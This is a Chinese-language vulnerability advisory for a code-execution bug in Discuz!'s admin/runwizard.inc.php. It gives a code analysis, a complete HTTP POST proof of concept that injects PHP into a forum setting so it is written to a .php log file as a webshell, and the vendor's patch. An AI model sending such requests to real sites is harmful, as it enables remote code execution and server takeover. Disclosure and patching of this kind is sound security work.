Discuz! admin\runwizard.inc.php get-webshell bug
author: 80vul-A
team:http://www.80vul.com
由于Discuz!的admin\runwizard.inc.php里saverunwizardhistory()写文件操作没有限制导致执行代码漏洞.
一 分析
在文件admin\runwizard.inc.php里代码:
$runwizardhistory = array();
$runwizardfile = DISCUZ_ROOT.'./forumdata/logs/runwizardlog.php';
if($fp = @fopen($runwizardfile, 'r')) {
$runwizardhistory = @unserialize(fread($fp, 99999));
fclose($fp);
}
.......
if(submitcheck('step1submit')) {
$runwizardhistory['step1']['size'] = $size;
$runwizardhistory['step1']['safe'] = $safe;
$runwizardhistory['step1']['func'] = $func;
saverunwizardhistory();
}
........
function saverunwizardhistory() {
global $runwizardfile, $runwizardhistory;
$fp = fopen($runwizardfile, 'w');
fwrite($fp, serialize($runwizardhistory));
fclose($fp);
}
上面代码可以看出来当有后台权限时,可以直接得到webshell.如果结合xss[如:SODB-2008-01,SODB-2008-02..等] crsf[如:SODB-2008-03]等漏洞,可以直接通过admin身份远程写入webshell执行代码.
二 利用
poc:
POST /bbs/admincp.php?action=runwizard&step=3 HTTP/1.1
Host: www.80vul.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.80vul.com/bbs/admincp.php?action=runwizard&step=2
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 207
formhash=a1ae055f&anchor=&settingsnew%5Bbbname%5D=%3C%3Fphpinfo%28%29%3B%3F%3E&settingsnew%5Bsitename%5D=Comsenz+Inc.&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%CF%C2%D2%BB%B2%BD
webshell:
http://www.80vul.com/bbs/forumdata/logs/runwizardlog.php
三 补丁[fix]
今天发布的dz7 bt版本[1]已经fix这个漏洞了:
function saverunwizardhistory() {
global $runwizardfile, $runwizardhistory;
$fp = fopen($runwizardfile, 'w');
$s = '<?php exit;?>';
$s .= serialize($runwizardhistory);
fwrite($fp, $s);
fclose($fp);
}
[1]:http://download.comsenz.com/Discuz/7.0.0Beta/Discuz_7_Beta_SC_GBK.zip